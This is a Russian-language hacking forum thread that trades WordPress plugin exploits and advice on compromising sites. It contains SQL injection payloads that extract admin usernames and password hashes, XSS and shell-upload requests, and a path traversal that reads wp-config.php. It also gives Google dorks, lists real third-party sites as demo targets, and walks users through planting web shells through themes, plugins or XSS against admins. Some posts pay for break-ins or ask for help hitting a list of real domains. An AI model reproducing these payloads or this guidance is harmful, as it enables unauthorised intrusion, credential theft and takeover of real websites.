Просмотр полной версии : [ Обзор уязвимостей WordPress ]
# Exploit Title: ripe-hd-player SQL-Inj
# Date: 19.10.2012
# Exploit Author:ukrpunk
# Vendor Homepage: find by yourself
# Software Link: find by yourself
# Version: don't know
# Tested in: web
# Dork:inurl:"/plugins/ripe-hd-player"
# Exploit:-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_use rs--
# PoC: http://www.fitness-bucuresti.ro/wp-content/plugins/ripe-hd-player/config.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_use rs--
народ, кто в курсе как залить шелл в wp 3.4.2 ?
народ, кто в курсе как залить шелл в wp 3.4.2 ?
Через шаблоны.
Кто нибудь объяснит как раскрутить эту тему:
################################################## #################################
# Exploit Title: wordpress Count per Day Cr oss Site Scripting Vulnerability
#
# Google Dork:inurl:/wp-content/plugins/count-per-day
#
# Date: 08/24/2012
#
# Author: Crim3R
#
# Version 3.2.3
#
# Vendor Home : http://downloads.wordpress.org/plugin/count-per-day.3.2.3.zip
#
# Tested on: all
#
################################################## #################################
$
$Author will be not responsibleforany damage.
$
################################################## #################################
========================================
first notes.php is not restricted to adminan danyone can access it directty by
browser=>an attacker can add notes witch
can be html codes=>its Stored Xss
gotoWP-path/wp-content/plugins/count-per-day/notes.php
in the notes section add html codeandclick Add
D3M0:
http://www.christinedesavino.com/blog/wp-content/plugins/count-per-day
http://www.dhakadakshinghsc.com/wp-content/plugins/count-per-day/
www.watansport.net/ara/wp-content/plugins/count-per-day/
===============Crim3R@Att.Net===========
$home= %00
thanks to:2MzRp-Mikili-0x0ptim0us-iC0d3R-farbodmahini&Amir
народ, кто в курсе как залить шелл в wp 3.4.2 ?
Через плагины)
Есть какой нить сканер под wp который ищет уязвимости в плагинах?
Вот тут найдешь полюбас! (http://bit.ly/PSlHQA)
подскажите exploit под WordPress 3.4.2
winstrool
28.10.2012, 22:59
WordPress "All-in-One-SEO-Pack V 1.6.15.2" component ActiveXSS
Уязвим параметр $_POST['aiosp_menulabel']
Эксплyатация:
В админ панели при заполнение полей, поле
Меню метки: передаем
alert("5")
Дорк: "inurl:/plugins/all-in-one-seo-pack/"
Уязвимый код:
Намеренно пока не выкладываю
P.S:Чуcтвую запах sql-injection.
Сайт разработчика: _ht_p://sempe[antisearch]rplugins.com/
P.S: надеюсь не боян, нашел сегодня на последней фри-версии!
Через плагины)
Через шаблоны.
а можно хоть прмер или где про ето почитать?
а можно хоть прмер или где про ето почитать?
Скачай любой плагин для вп и закинь в архив свой шелл...
Через шаблоны.
Через редактирование шаблонов измени шаб и залейся через wget например...
а можно хоть прмер или где про ето почитать?
Пакуем шелл в зип.
Например rss_class.php => rss_class.zip
Добавляем плагин, выбираем наш архив.
Готово.
/wp-content/plugins/rss_class/
Скачай любой плагин для вп и закинь в архив свой шелл...
Через редактирование шаблонов измени шаб и залейся через wget например...
Через шаблоны не всегда удается залится, ибо могут быть урезаны права на запись.
Wordpress Plugin tdo-mini-forms (rfu/rfd) Vulnerabilities
wordpress tdo-mini-forms plugin(rfu/rfd)Vulnerabilities
------------------------------------------------------------
wordpress tdo-mini-forms plugin(remote file upload/remote file deletion)Vulnerabilities
Auther:Cold z3ro,www.hackteach.org,www.s3curi7y.c om
Anonymous=>You are the man
# Remote file upload :
wordpress/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
file extension:file.php%00;.jpg
uploaded path:
wordpress/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP%00;.jpg
Example to uploaded path:
wordpress/wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg
# Remote file Deletion
=>Note:useing Any http POST header modifier.
tdomf_form_id=1;
deletefile[] =1;
filepath=$varibale(wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg)
index=NULL
Example to result:
wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&deletefile[]=1&filepath=../../../wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg&index=
Eof;
# 1337day.com/exploit/19776 [2012-11-21]
Кто нибудь скажет как заставить этот плагин залить мой файл в формате .php?
Нашел уязвимость в плагине wp, может кому-то будет полезная.
Wordpress "count-per-day v3.2.4" plugin PHP Code Execution
В админке в настройках плагина параметр "Последние счетчики - Дни:"
7);phpinfo(
Результат:
/wp-content/plugins/count-per-day/ajax.php?f=count&time=9999999999
WordPress SEO Plugin 1.3.11 Cross Site Script Vulnerability
[+] WordPress SEO Plugin 1.3.11 Cross Site Script XSS
[+] Found by Angel Injection
[+] Version: 1.3.11
Exploit:
http://localhost/?s=[xss here]&x=0&y=0
http://localhost/?s=">alert(1)&x=0&y=0
Wordpress 3.5 Active XSS
Нужны права администратора.
Идем в комментарии к записи, и в комментариях вставляем JS код, к примеру:
">alert('XSS Test')
http://makescreen.ru/ii/a697d2a65ef93af9a3b111d87350fe.jpg (http://makescreen.ru/screen/a697d2a65ef93af9a3b111d87350fe)
Проверить можно тут (http://nz-quest.ru/wp/?p=1).
L: test
P: test
(c) MaxFast aka n3m1s
MaxFast, бага отработала под акком админа, под гостем идет экранирование.
Wordpress 3.5 Full Path Disclosure
Exploit:
localhost/?cat[]=1
Result:
Warning: urldecode() expects parameter 1 to be string, array given in *path* on line 1735
Example:
_tpp://sergeybiryukov.ru/?cat[]=1
_ttp://wpsymposium.com/?cat[]=1
Found by MaxFast aka n3m1s
[B]Wordpress Error - I can not get the source code for your site."[/COLOR]);
}
preg_match_all("| array given in (.*?)wp-includes|i",$source,$m);
foreach($m[1] as$match) {
echo"".$match."";
}
}
?>
Wordpress 3.5 Full Path Disclosure Exploit | By n3m1s and zed0x
body { background-color: #111; color: #FFF; font-family: Verdana; font-size: 16px; }
input { background-color: #222; color: #FFF; font-family: Verdana; font-size: 16px; padding: 5px; border: 0px; }
.error { margin-top: 25px; color: red; font-family: Verdana; font-size: 14px; background-color: #222; padding: 10px; text-align: center; }
.result { margin-top: 25px; color: green; font-family: Verdana; font-size: 14px; background-color: #222; padding: 10px; text-align: center; }
Target:
URL not valid");
getCat($URL);
}
?>
[/COLOR]
[/PHP]
NOTICE: this exploit for web, do not forget about copyright!
Ребят, я всё понимаю "активность" и всё такое, но я не вижу смысла в эксплойте из одной строчки, максимум что делающего - раскрывающего пути. Да ещё только 1 метод представлен. Бред.
У меня к Вам предложение - впихините в код все известные методы раскрытия пути на WordPress - получите и от меня +, и от других форумчан спасибо.
В противном случае придётся удалить топик за ненадобностью. Согласитесь - кому захочется качать php exploit, копировать на тачку, запускать, когда просто можно сделать 1 простое дейсвтие в адресной строке даже по памяти ??
bredbaraded
03.01.2013, 18:41
Wordpress 3.5 Active XSS
Нужны права администратора.
Идем в комментарии к записи, и в комментариях вставляем JS код, к примеру:
">alert('XSS Test')
http://makescreen.ru/ii/a697d2a65ef93af9a3b111d87350fe.jpg (http://makescreen.ru/screen/a697d2a65ef93af9a3b111d87350fe)
Проверить можно тут (http://nz-quest.ru/wp/?p=1).
L: test
P: test
(c) MaxFast aka n3m1s
C правами админа и iframe можно вставить.
pharm_all
12.01.2013, 22:15
Intelligently guesses hash values in order to extract Wordpress password hashes via W3 Total Cache.
+# This affects W3 Total Cache
Wordpress Plugins - slidedeck2 pro XSS/File Upload Vulnerability
# Author => Zikou-16
# Download plugin : http://wordpress.org/extend/plugins/slidedeck2/
#=> Exploit Info :
------------------
# The attacker can inject HTML codes & inject a simple file uploader to upload shell
------------------
------------------
#=> XSS
------------------
http://[target]/[path]/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
inj3ct u'r HTML codes in (Text) then click Copy To Clipboard...
screenshot #=> http://i49.tinypic.com/1zgqngx.png
------------------
#=> Shell Upload
------------------
http://[target]/[path]/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
inj3ct u'r simple file uploader & upload u'r shell
screenshot #=> http://i45.tinypic.com/1426mhg.jpg
------------------
#=> Demos
------------------
http://thevillagevenue.com/wordpress/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
http://dreamland.com.pk/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
http://oldsouthpawn.com/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
Судя по описанию автора можно вставить простой HTML код загрузки файла с компа, но есть одно большое НО! Без исполняющего .php файла на сервере никакая HTML форма загрузки не сможет залить файл на сервак.
Вопрос: какие идеи?
© Источник (http://www.1337day.com/exploit/20235)
wordpress
Если нарушаю правила, прошу админа не наказывать строго, просто очень нужно не знаю где запостить.. Вопрос состоит вот в чем. Настроил 2 вордпресса, слышал тут есть умельцы, которые щелкают их как семечки. Кто сможет получить доступ хоть на 1 из моих WP плачу 100 wmz (или обговорим на большее).. прошу проявить лояльность и не удалять этот топик, никаких данных тут не кидаю все вопросы в аську...
icq: 640831391
Есть сайт Wordpress 3.4.1 - как узнать какие плагины стоят?
Есть папка uploads, где видно все файлы. Значит где то есть uploader?
strelok20094
09.05.2013, 18:53
Есть сайт Wordpress 3.4.1 - как узнать какие плагины стоят?
Есть папка uploads, где видно все файлы. Значит где то есть uploader?
Просканируй сайт этой прогой Web Vulnerability Scanner 8
там будет папка wp-content/plugins Так вот в ней и лежал плагины
Unknowhacker
31.05.2013, 14:27
Версия 3.5 и 3.5.1
Чтобы воспользоваться ниже упомянутой уязвимостью нужно иметь права редактора или администратора, то есть права на размещение/редактирование новостей. При размещении в тело сообщения JavaScript кода:
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ">'>alert(String.fromCharCode(88,83,83))
после чего и срабатывает уязвимость. Таким образом мы видим, что злоумышленник может получить возможность атаковать всех пользователей, которые просто зайдут почитать размещённую новость или статью. При определенных манипуляциях с кодом можно также заразить массу посетителей сайта вирусом, перенаправляя их на вредоносный сайт.
все облазил) никак не получается шелл впихнуть на wp 3.3. при загрузке плагинов\тем просит FTP доступ напомнить ему. редактор не помогает. Есть варианты какие нибудь?
EDIT
Все мои попытки загружать медиафайлы отображаются в графе Медиафайлы (с пометкой что не прикреплены или еще что нибудь) жмем редактировать -> узнаем путь -> профит. может пригодится кому нибудь)
psihoz26
27.06.2013, 14:12
WordPress marker_listings.xml SQL injection
Google dork:
inurl:"wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id="
Vulnerable script:
h**p://WordPress.eX/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,COLUMN_NAME,TABLE_N AME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31+FROM+INFORMATION_SCHEMA.COLUMNS+--+
Ребят, как эксплуатировать эту уязвимость, WordPress WP-Print Plugin CSRF
Сам плагин, версии 2.31
psihoz26
16.09.2013, 00:08
очередная возможность узнать версию вордпресс
файл redame.html в корневой папке с блогом
пример
http://www.lasalle.edu/readme.html
http://www.blackandabroad.com/readme.html
Извиняюсь если не туда пишу, можно ли залить шелл на вордпресс 3.7.1 если нет прав на запись файлов?
Google dork:
inurl:"wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id="
Vulnerable script:
h**p://WordPress.eX/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,COLUMN_NAME,TABLE_N AME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31+FROM+INFORMATION_SCHEMA.COLUMNS+--+
это до какой версии работало?
Ravenous
11.12.2013, 19:24
formcraft Plugin Sql Injection
файл /wp-content/plugins/formcraft/form.php
get_results("SELECT * FROM$table_builderWHERE id=$_GET[id]","ARRAY_A");
$con=stripslashes($myrows[0]['con']);
$con=json_decode($con,1);
inurl:"plugins/formcraft/"
какой есть еще способ залиться в wp ?
при загрузке плагина просит пароль от ftp, имеющиеся плагины нельзя изменить, нет прав на запись.
какой есть еще способ залиться в wp ?
при загрузке плагина просит пароль от ftp, имеющиеся плагины нельзя изменить, нет прав на запись.
Сейчас как раз дописываю одну вещь по аплоаду в WP.
Если есть желание и трудный сайт - помогу в рамках тестирования продукта в ПМ.
vr4nonymous
27.01.2014, 16:56
Custom Content Type Manager
url : http://yoursite.com/wp-content/plugins/custom-content-type-manager/ajax-controllers/download_def.php
скачать .json
вид Admin Email
xPriZrAkx
30.01.2014, 13:06
какой есть еще способ залиться в wp ?
при загрузке плагина просит пароль от ftp, имеющиеся плагины нельзя изменить, нет прав на запись.
Когда просит пасс итд все равно все залилось Пробуй
Wordpress Plugin (wp-e-commerce v3.8.9.5) Multiple Vulnerabilities
"@$uploadfile"));
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_HTTPHEADER,$headers);
$postResult=curl_exec($ch);
curl_close($ch);
print"$postResult";
?>
©Взято от Сюда (http://1337day.com/exploit/21789)
Вот только не заливается шелл немогу понять в чём причина, кто разберется будьте добры помочь, вот Вам домены для теста:
http://1CCLUB.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://40MOBILE.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://4WR.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://9899669.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://AFSERVICE.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://AISBERG24.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://ALL-HTC.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://ALTERKRESLA.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://AMARTCOM.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://angel23.ru/wp-content/plugins/wp-e-commerce/readme.txt
http://ANTIKFOREVERY1.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://APIKLIN.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://APK-NN.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://ARCHIMEDNOV.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://ARENDAMD.RU/wp-content/plugins/wp-e-commerce/readme.txt
Домены именно той версии которую требует уязвимость.
Есть админка вордпресс , как залить шелл? Редактировать файлы 404 и другие запрещено (нет прав на запись файлов темы) плагин не устанавливается( нужна авторизация FTP ) WP ниже 3.8.1
Совет от xPriZrAkx не помог ,он просто при нажатии просит пароль и не заливает
Способ с 2 админами тоже не катит
Sum.cogitans
15.02.2014, 13:31
Есть админка вордпресс , как залить шелл? Редактировать файлы 404 и другие запрещено (нет прав на запись файлов темы) плагин не устанавливается( нужна авторизация FTP ) WP ниже 3.8.1
Совет от xPriZrAkx не помог ,он просто при нажатии просит пароль и не заливает
Способ с 2 админами тоже не катит
Редактировать а не устанавливать плагины. Может быть проверка контрольной суммы, так что выбирать плагин с кол-вом строк >=, чем в шеле.
P.s. Ну и сам шелл возьми из паблика, с минимальным кол-вом строк, потом свой перезальешь.
нет прав на запись файлов темы
Также просит пароль от FTP? Если да, значит шелл уже залился.
Сейчас как раз дописываю одну вещь по аплоаду в WP.
Если есть желание и трудный сайт - помогу в рамках тестирования продукта в ПМ.
BigBear помог залить шелл , огромная благодарность!
McNamara
03.03.2014, 15:17
хм
Народ, а кто бы мог написать обработчик експа CKEditor 4.0 http://1337day.com/exploit/20318 ? Сорец на perl есть, с какой то ошибкой. Ну, и само собой что бы он обрабатывал по списку. ( ясен пень что не за бесплатно ) .
Друзья такой вопрос.
Стянул куки админа с сайта на wordpress 2.3.3
Авторизировался под ним, но в админку зайти не могу, так как cтоит http basic авторизация на папку wp-admin.
Подскажите, какие могут быть дальнейшие действия?
Unknowhacker
17.03.2014, 12:51
Что можете посоветовать для версии 3.8.1, при сканировании wpsscan нет уязвимых плагинов.
reuvenmatbil
22.03.2014, 12:47
подскажите кто знает
wp-content/plugins/bbpress/ -уязвимость показал впскан
что поставить после bbpress/?
при простом открытии -пустая страница, если на подобе такого подставить topic.php?id[]=12&replies=3
пишет страница не найдена и ошибка Warning: session_start() [function.session-start]: open(/
Toto Riina
30.03.2014, 16:20
есть доступы к ftp и хостингу , где можно узнать пароль от админки ? если не затруднит в личку
sara_luc
08.04.2014, 23:04
Toto Riina said:
есть доступы к ftp и хостингу , где можно узнать пароль от админки ? если не затруднит в личку
либо через базу узнавай хеш,либо тупо сниффер на форму логина и пароля ставь
to BigBear
Сейчас как раз дописываю одну вещь по аплоаду в WP. Если есть желание и трудный сайт - помогу в рамках тестирования продукта в ПМ.
Этот uploader у тебя как сплойт или работает при имеющимся доступе к админке? И это для привата или гдето сие чудо можно протестить? Для каких версий WP?
to BigBear
Этот uploader у тебя как сплойт или работает при имеющимся доступе к админке? И это для привата или гдето сие чудо можно протестить? Для каких версий WP?
Версии с 1.0 по 3.8.6 - специально ставил каждую и переписывал сплойт под англо/ру/ино язычные сайты.
В паблике такого не найдёшь.
Протестировать нигде. Но в рамках паблик-ачат-тестирования - пару сайтов пробью.
Кто-нибудь может пояснить эту уязвимость - http://1337day.com/exploit/22012 ? В частности Directory Traversal/Arbitrary code execution/Arbitrary File read. Сколько не читал, не проникнусь, что и как делается.
а есть какие нибудь софты для проверки на уязвимость? актуальные и хорошие. так как в наше время вроде уже хрен найдешь с уязвимостью +(
winstrool
05.06.2014, 13:08
exploit cforms 14.6 shell upload
Плагин: cforms 14.6 - последняя версия на сегодня!
shell upload
оффициальный сайт:
_ttp://www.deliciousdays.com/cforms-plugin/
При настройках по умолчанию и с формой для заливки файлов, льет:
localhost/wp-content/plugins/cforms/noid-shell.php
для исключения подобной возможности, в настройках можно указать отдельную папку для заливкии положить в нее .htaccess c запретом выполнения скриптов, или переписать скрипт.
look2009
12.08.2014, 01:41
Dork : revslider.php "index of"
Wordpress Slider Revolution Responsive
[QUOTE="look2009"]
Dork : revslider.php "index of"
Wordpress Slider Revolution Responsive
Плагин:
cforms 14.6
- последняя версия на сегодня!
shell upload
оффициальный сайт:
При настройках по умолчанию и с формой для заливки файлов, льет:
для исключения подобной возможности, в настройках можно указать отдельную папку для заливкии положить в нее .htaccess c запретом выполнения скриптов, или переписать скрипт.
Видел эти шеллы, но как лить?
Видел эти шеллы, но как лить?
Аналогично, ковырял так и не понял как лить, а шеллы встречаются довольно часто, находил на забугор форумах описание, о том, что нужно капать в сторону файла: lib_ajax.php, а именно переменную " r " или " rs " где то здесь:
functionsajax_handle_client_request() {
global$sajax_export_list;
$mode="";
if (! empty($_GET["rs"]))
$mode="get";
if (!empty($_POST["rs"]))
$mode="post";
if (empty($mode))
return;
$target="";
### 10.02. Added header
header('Content-Type: text/javascript');
header('X-Content-Type-Options: nosniff');
if ($mode=="get") {
### Bust cache in the head
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");### Date in the past
header("Last-Modified: ".gmdate("D, d M Y H:i:s") ." GMT");
### always modified
header("Cache-Control: no-cache, must-revalidate");### HTTP/1.1
header("Pragma: no-cache");### HTTP/1.0
$func_name= ($_GET["rs"] );### 10.2.2012 sajax_sanitize removed
if (! empty($_GET["rsargs"]))
$args= ($_GET["rsargs"] );### 10.2.2012 sajax_sanitize removed
else
$args= array();
}
else {
$func_name= ($_POST["rs"] );### 10.2.2012 sajax_sanitize removed
if (! empty($_POST["rsargs"]))
$args= ($_POST["rsargs"] );### 10.2.2012 sajax_sanitize removed
else
$args= array();
}
winstrool
07.10.2014, 02:16
Уязвимость в шаблонах для WordPress от автора "ronangelo" пасивная XSS
его темы можно идентифецировать по файлу readme.txt в корне темы:
http://localhost/wp-content/themes/asteroid/readme.txt
Примеры уязвимых сайтов:
_ttps://wp-themes.com/wp-content/themes/asteroid/includes/content-width.php?content_width=%3Cscript%3Ealert%28%22123 %22%29;%3C/script%3E
_ttp://rwandanationalparks.com/wp-content/themes/asteroid/includes/content-width.php?content_width=%3Cscript%3Ealert%28123%29 ;%3C/script%3E
_ttp://www.serpsherpa.com/wp-content/themes/frontier/includes/content-width.php?content_width=%3Cscript%3Ealert%28123%29 ;%3C/script%3E
_ttp://ramkrista.com/wp-content/themes/frontier/includes/content-width.php?content_width=%3Cscript%3Ealert%28123%29 ;%3C/script%3E
сам уязвимый код:
.mceContentBody {width: px;}
статья, как лить шелл в WP при XSS:
_ttp://habrahabr.ru/company/dsec/blog/194282/
у меня есть доступ к админке http://savepic.org/6279076.jpg не могу понять как туда залить шелл
nick_sale
20.10.2014, 04:21
у меня есть доступ к админке http://savepic.org/6279076.jpg не могу понять как туда залить шелл
попробуй подставить путь,должно открыть окно загрузки плагинов
/wp-admin/update.php?action=upload-plugin
у меня есть доступ к админке http://savepic.org/6279076.jpg не могу понять как туда залить шелл
Зайди в установку темы, выбери файл с компа то есть твой шелл (например: shell.php) и загрузи его, выдаст какую то ошибку (всегда по разному), а шелл открывай так:
domain/wp-content/uploads/shell.php
или
domain/wp-content/uploads/2014/10/shell.php
в 99% случаях заливается.
попробуй подставить путь,должно открыть окно загрузки плагинов
/wp-admin/update.php?action=upload-plugin
не помогло пишет недостаточно прав
Зайди в установку темы, выбери файл с компа то есть твой шелл (например: shell.php) и загрузи его, выдаст какую то ошибку (всегда по разному), а шелл открывай так:
domain/wp-content/uploads/shell.php
или
domain/wp-content/uploads/2014/10/shell.php
в 99% случаях заливается.
нету пункта установка тем, могу заливать только медиафайлы
Есть у кого еще идеи?
djumiksc
26.10.2014, 12:24
Есть у кого еще идеи?
Я так понимаю, что у тебя доступ в админку юзера без админских прав.
Скорей всего это редактор.
Попробуй сделать следующее:
Создай любой пост (по теме блога) и пихни в него код
twentythirteen - это имя темы, замени его на свою.
Теперь после того, как любой авторизованный админ откроет твой пост, то выполниться скрипт и шелл будет залит в файл 404.php (шаблон 404 ошибки)
Шелл доступен по адресу
http://site.com/?p=123123123&cmd=id
Я так понимаю, что у тебя доступ в админку юзера без админских прав.
Скорей всего это редактор.
Попробуй сделать следующее:
Создай любой пост (по теме блога) и пихни в него код
twentythirteen - это имя темы, замени его на свою.
Теперь после того, как любой авторизованный админ откроет твой пост, то выполниться скрипт и шелл будет залит в файл 404.php (шаблон 404 ошибки)
Шелл доступен по адресу
http://site.com/?p=123123123&cmd=id
разве там нет anti-csrf хеша ?
https://wpvulndb.com/
ежедневное обновление уязвимостей вп
https://github.com/dionach/CMSmap
CMSmap сканер уязвимостей для популярных CMS WordPress, Joomla, Drupal.
По сути,аналог WPScan , только можно использовать на Windows + поддержка веб-шелла.
https://github.com/joren485/WP-Slimstat-SQLI
скрипт для эксплутации бага WP-Slimstat
http://blog.sucuri.net/2015/02/security-advisory-wp-slimstat-3-9-5-and-lower.html
https://github.com/delvelabs/vane GPL форк известного сканера WPScan
winstrool
18.03.2015, 22:06
MAC PHOTO GALLERY v. 2.7
MAC PHOTO GALLERY
dork: inurllugins/mac-dock-gallery/ download
@version:2.7
Уязвимый код:
$file=dirname(dirname(dirname(__FILE__)))."/uploads/mac-dock-gallery/".$_GET['albid'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename='.basename($fi le));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Content-Length: '.filesize($file));
ob_clean();
flush();
readfile($file);
POC:
_ttp://rolfeckel.com/blog/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php
PATCH:
https://wordpress.org/plugins/mac-dock-gallery/other_notes/
TacticiaN
21.04.2015, 17:23
Sorry for my English
does any body know how to use the latest revslider exploit
to upload shell
Reference: https://wpvulndb.com/vulnerabilities/7540
Reference: http://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
Reference: http://marketblog.envato.com/general/affected-themes/
Reference: http://packetstormsecurity.com/files/129761/
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1579
Reference: http://osvdb.org/109645
Reference: http://www.exploit-db.com/exploits/34511/
Reference: http://www.exploit-db.com/exploits/35385/
Reference: http://www.exploit-db.com/exploits/36039/
Thanks
WordPress 4.2 stored XSS
*Details*
If the comment text is long enough, it will be truncated when inserted in
the database. The MySQL TEXT type size limit is 64 kilobytes so the comment
has to be quite long.
The truncation results in malformed HTML generated on the page. The
attacker can supply any attributes in the allowed HTML tags, in the same
way as the previous stored XSS vulnerabilities affecting WordPress.
The vulnerability bears a similarity to the one reported by Cedric Van
Bockhaven in 2014 (patched this week, after 14 months). Instead of using an
invalid UTF-8 character to truncate the comment, this time an excessively
long comment text is used for the same effect.
In these two cases the injected JavaScript apparently can't be triggered in
the administrative Dashboard, so these exploits require getting around
comment moderation e.g. by posting one harmless comment first.
*Proof of Concept*
Enter the following as a comment:
This was tested on WordPress 4.2, 4.1.2, and 4.1.1, MySQL versions 5.1.53
and 5.5.41.
*Solution*
Disable comments (Dashboard, Settings/Discussion, select as restrictive
options as possible). Do not approve any comments.
*Credits*
The vulnerability was discovered by Jouko Pynnönen of Klikki Oy.
An up-to-date version of this document:
http://klikki.fi/adv/wordpress2.html
ICQ Hool
29.04.2015, 16:31
WordPress NextGEN Gallery 2.0.63 Shell Upload Vulnerability
WordPress NextGEN Gallery plugin version 2.0.63 suffers from a remote shell upload vulnerability.
# Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary File
Upload
# Author: SANTHO ( @s4n7h0 )
# Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/
# Category: WebApp / CMS / Wordpress
# Version: 2.0.63 and less
---------------------------------------------------
Vulnerability Tracking
======================
Reported to vendor : Fri, May 9, 2014 at 9:20 PM
Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM
Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at
7:54 PM
Vulnerability Details
=======================
POST
/index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=
HTTP/1.1
Host: target_ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101
Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[target_ip]/wp-admin/admin.php?page=ngg_addgallery
Content-Length: 630
Content-Type: multipart/form-data;
boundary=---------------------------2427186578189
Cookie:
X-Frame-Events_290365e482ebdeeed313858b8a3de791=%7B%22even t%22%3A%22new_gallery%22%2C%22gallery_id%22%3A1%2C %22gallery_title%22%3A%22folder_name%22%2C%22conte xt%22%3A%22attach_to_post%22%7D;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_57cce18206a53fed21932c6dc2920f 94=admin%7C1399203127%7C70f668b775581773d1500b1b81 62de42;
wp-settings-time-1=1399030444
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------2427186578189
Content-Disposition: form-data; name="name"
cmd.php.jpg
-----------------------------2427186578189
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg
The Shell can be accessible at following URL
http://[target-ip]/wp-content/gallery/folder_name/cmd.php
# 1337day.com #
Подскажите пожалуйста как этим чудом пользоваться?
ICQ Hool said:
↑ (https://antichat.live/posts/3841830/)
WordPress NextGEN Gallery 2.0.63 Shell Upload Vulnerability
WordPress NextGEN Gallery plugin version 2.0.63 suffers from a remote shell upload vulnerability.
# Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary File
Upload
# Author: SANTHO ( @s4n7h0 )
# Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/
# Category: WebApp / CMS / Wordpress
# Version: 2.0.63 and less
---------------------------------------------------
Vulnerability Tracking
======================
Reported to vendor : Fri, May 9, 2014 at 9:20 PM
Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM
Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at
7:54 PM
Vulnerability Details
=======================
POST
/index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=
HTTP/1.1
Host: target_ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101
Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[target_ip]/wp-admin/admin.php?page=ngg_addgallery
Content-Length: 630
Content-Type: multipart/form-data;
boundary=---------------------------2427186578189
Cookie:
X-Frame-Events_290365e482ebdeeed313858b8a3de791=%7B%22even t%22%3A%22new_gallery%22%2C%22gallery_id%22%3A1%2C %22gallery_title%22%3A%22folder_name%22%2C%22conte xt%22%3A%22attach_to_post%22%7D;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_57cce18206a53fed21932c6dc2920f 94=admin%7C1399203127%7C70f668b775581773d1500b1b81 62de42;
wp-settings-time-1=1399030444
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------2427186578189
Content-Disposition: form-data; name="name"
cmd.php.jpg
-----------------------------2427186578189
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg
The Shell can be accessible at following URL
http://[target-ip]/wp-content/gallery/folder_name/cmd.php
# 1337day.com #
Подскажите пожалуйста как этим чудом пользоваться?
нужно отправить POST запрос, где при отправке подменить расширение с jpg на php
шелл будет по адресу /wp-content/gallery/folder_name/shell.php
kingbeef
29.04.2015, 19:54
↑ (https://antichat.live/posts/3829425/)
MAC PHOTO GALLERY v. 2.7
MAC PHOTO GALLERY
dork: inurl
lugins/mac-dock-gallery/ download
